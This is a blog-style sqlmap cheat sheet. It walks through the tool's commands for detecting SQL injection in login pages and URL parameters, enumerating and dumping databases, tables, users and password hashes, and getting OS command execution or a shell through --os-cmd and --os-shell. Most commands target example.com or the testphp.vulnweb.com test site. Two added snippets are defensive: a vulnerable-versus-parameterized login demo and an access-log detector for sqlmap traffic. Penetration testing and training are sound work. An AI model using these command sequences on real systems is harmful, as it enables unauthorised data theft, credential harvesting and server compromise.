SQLmap cheat sheet

Md. Mahim Bin Firoj
5 min read, Dec 9, 2024


Image credit: Vaadata

Disclaimer: Before using the sqlmap tool, you must have proper permission to play with the database. Hacking is illegal. The author will not be held responsible in case of any misuse of the tool.

SQLmap command usage:

SQLmap ships with Kali by default. Update it before use.
https://www.stationx.net/sqlmap-cheat-sheet/ has a SQLmap command generator tool you can use to build commands.

I have made this for my own convenience. You can take reference from here and make your own :)

Let’s start:

sqlmap -h (for help)

Some common command options:

-u or --url: the target URL to test for the vulnerability.
-p: the parameter to test, for example the username or password field. You can use Burp or OWASP ZAP to see which field carries the username and password values.
--data: POST data to test, for example id=1.
-o: quickly export the result to a file.
--tor: lets you stay anonymous while scanning.
--wizard: for beginners; it gives you an interactive guide to the usage.
-d: get database names, table names and column names.
-D: a specific database name.
-T: a specific table name.
--level (value 1-5) and --risk (value 1-3): tell sqlmap how aggressively it may interact with the server or target URL.
--tamper: tamper scripts to bypass a WAF/IPS/firewall.
--method: the HTTP method, GET, POST etc.
--save: save the current session.
--resume: resume from the previous session.
--dbs: database fingerprinting.
--dump or --dump-all: dump all the juicy data.
--dbms=mysql (or another DB name).

Testing SQL injection in a login page:

If the parameters are sent via a GET request (quote the URL so the shell does not treat & as a background operator):

sqlmap -u "https://example.com/login.php?username=admin&password=admin123" --method GET --dbs

If the parameters are sent via a POST request:

sqlmap -u "https://example.com/login.php" --method POST --data "username=admin&password=admin123" --dbs

You can use quotes or not; it will work either way.

If you saved the request to a text file with Burp (enter the username and password, intercept the request in Burp when you hit login, then save it to a file, here request.txt):

sqlmap -r request.txt --dbs
or
sqlmap -r request.txt --ignore-code 401

(You will be asked many questions; answer them based on your judgement or follow what it suggests. [Y/n] means pressing Enter is taken as Yes; [y/N] means pressing Enter is taken as No.)
It looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Select Yes if you are sure the DB is MySQL. Select No if you want to test all DBs with payloads.
For the remaining tests do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Select Y if you want a more extensive test. Select No if you want to go with the normal test.
Do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] Select No here. This actually varies; try Y on another run.
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n (your choice).

Now you have answered all the questions. If you want to automate this, use the --batch option.

sqlmap -r request.txt --ignore-code 401 --batch
It will take more time to complete.

Now you will be told about the vulnerabilities, with the payload, if any are found.
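Why sqlmap reports the login's username parameter as vulnerable, and what closes the hole, as an added example that is not from the original post: a constructed SQLite users table is queried once by string concatenation and once with bound parameters, and each version is sent the quote, AND 1=1 and AND 1=2 probes that error-based and boolean-based detection relies on.

```python
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the users table behind a login form.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'admin123')")
    return conn


def login_vulnerable(conn, username, password):
    # User input is pasted into the SQL text, so quotes and comments change the query.
    sql = ("SELECT COUNT(*) FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return conn.execute(sql).fetchone()[0] > 0


def login_parameterized(conn, username, password):
    # Bound parameters travel separately from the statement: input stays data, never SQL.
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


def probe(login, conn):
    """Send the three classic probes and record what the application reveals:
    'error' (database error leaked), True (login accepted) or False (rejected).
    A scanner flags the parameter when the 1=1 and 1=2 probes answer differently."""
    results = {}
    for label, user in (("quote", "admin'"),
                        ("true", "admin' AND 1=1 --"),
                        ("false", "admin' AND 1=2 --")):
        try:
            results[label] = login(conn, user, "wrongpassword")
        except sqlite3.Error:
            results[label] = "error"
    return results


if __name__ == "__main__":
    print("vulnerable:   ", probe(login_vulnerable, make_db()))
    print("parameterized:", probe(login_parameterized, make_db()))
```

The concatenated query leaks an error on the lone quote and accepts the 1=1 probe with a wrong password; the parameterized query rejects all three identically, giving a scanner nothing to distinguish.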

To find out database name and their tables:

sqlmap -r request.txt --ignore-code 401 --tables

It will first fetch the DB names and then the tables of each DB. Once all the DB names have been fetched you can stop it, so that you query only the tables of the DB you need.
Say you got the DB name korp_terminal:

sqlmap -r request.txt --ignore-code 401 -D korp_terminal --tables

Say you find a table called users:

sqlmap -r request.txt --ignore-code 401 -D korp_terminal -T users --dump

After the dump you will get the column names and everything else.

To dump everything plus shell access:

sqlmap -r request.txt --ignore-code 401 --dump-all --os-shell

Determining Users & Passwords With SQLmap:

sqlmap -r request.txt --ignore-code 401 --users

sqlmap -r request.txt --ignore-code 401 --passwords

Sometimes, when you stop a running command with Ctrl+C and re-run it, it resumes from the session where it was stopped. If you do not want that, use a command like the one below.

sqlmap -r request.txt --passwords --flush-session

If the vulnerability lies in the product category or URL:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
sqlmap -u https://example.com/news/hello-how-are-you --batch
sqlmap --help
sqlmap -u https://example.com/news/hello-how-are-you --batch --risk=3
sqlmap -u https://example.com/news/hello-how-are-you --batch --level=5

The above commands give you the DB name, version, underlying OS and schema info. After running them we get acuart as the DB name. Now we want to see all the tables of that DB, so we use the command below.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

Now we get the table names, so we use the command below to fetch data from a table. We get artists as a table. To find the columns of the artists table, run the command below.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T artists --dump

Now we get the column names of the artists table; aname is one of its columns. We can also dump specific columns of that table.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T artists -C aname --dump

This is how we finally dump the column data from the artists table as well.

Determining Users & Passwords With SQLmap:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --users

Here, users is the table.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --passwords

This reveals the password hashes of the usernames.

Command Injection With SQLmap:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --os-cmd="uname -a"

Opening a Shell With SQLmap: (sometimes it works, sometimes it does not)

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --os-shell

It will ask you for the server platform (PHP, ASP etc.). After you answer, it will ask: do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
If nothing is found, select option 2 and type /tmp.
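What these scans look like from the server side, as an added example that is not from the original post: a small detector run over constructed Apache combined-format access-log lines (IPs, timestamps and the sqlmap version string are made up) that flags sqlmap's default User-Agent and injection-shaped query strings, then counts flagged requests per client.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines; addresses, times and the version string are invented.
LOG_LINES = [
    '203.0.113.7 - - [09/Dec/2024:10:00:01 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [09/Dec/2024:10:00:02 +0000] "GET /listproducts.php?cat=1%27 HTTP/1.1" 500 312 "-" "sqlmap/1.8#stable (https://sqlmap.org)"',
    '203.0.113.7 - - [09/Dec/2024:10:00:02 +0000] "GET /listproducts.php?cat=1%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "sqlmap/1.8#stable (https://sqlmap.org)"',
    '203.0.113.7 - - [09/Dec/2024:10:00:03 +0000] "GET /listproducts.php?cat=1%20UNION%20ALL%20SELECT%20NULL%2CNULL-- HTTP/1.1" 200 5300 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [09/Dec/2024:10:00:05 +0000] "GET /listproducts.php?cat=2 HTTP/1.1" 200 4980 "-" "Mozilla/5.0"',
]

# Apache combined log format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# Signatures matched against the URL-decoded query string.
SQLI_PATTERNS = (
    ("tautology", re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("sql-comment", re.compile(r"--|/\*")),
    ("stray-quote", re.compile(r"'")),
)


def classify(line):
    """Return (client ip, list of reasons); the list is empty for benign traffic."""
    m = LOG_RE.match(line)
    if not m:
        return None, ["unparsed"]
    reasons = []
    # sqlmap announces itself unless the operator changes the agent (e.g. --random-agent).
    if m.group("ua").lower().startswith("sqlmap/"):
        reasons.append("sqlmap-user-agent")
    query = unquote_plus(urlsplit(m.group("target")).query)
    reasons += [name for name, rx in SQLI_PATTERNS if rx.search(query)]
    return m.group("ip"), reasons


def suspicious_sources(lines):
    """Count flagged requests per client; a burst from one address is the
    footprint an automated scanner leaves even when the agent string is changed."""
    counts = Counter()
    for line in lines:
        ip, reasons = classify(line)
        if ip and reasons:
            counts[ip] += 1
    return counts
```

The User-Agent check catches a default sqlmap run; the query-string signatures still catch the fourth line, where the agent was changed but the UNION probe and trailing comment remain.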

Relevant commands:

For example, if Burp Suite is installed in one VM and Kali in another, you may need to move the request.txt file (which contains the intercepted login request) to the Kali VM. The scp command helps in that case.

scp /home/kali/request.txt kali@192.168.1.100:/home/kali/

It will ask for the password of the user on the destination machine.

If you find that you cannot reach the Kali VM, the SSH service may not be running. Use the commands below to fix that.

systemctl start ssh (on the destination machine)
systemctl enable ssh (on the destination machine)

Thanks. I hope this helps you a lot. Kindly consider subscribing.

Special thanks to Stationx and Motassem Hamdan.

LinkedIn:

https://www.linkedin.com/in/md-mahimbin-firoj-7b8a5a113/

YouTube:

https://www.youtube.com/@mahimfiroj1802/videos
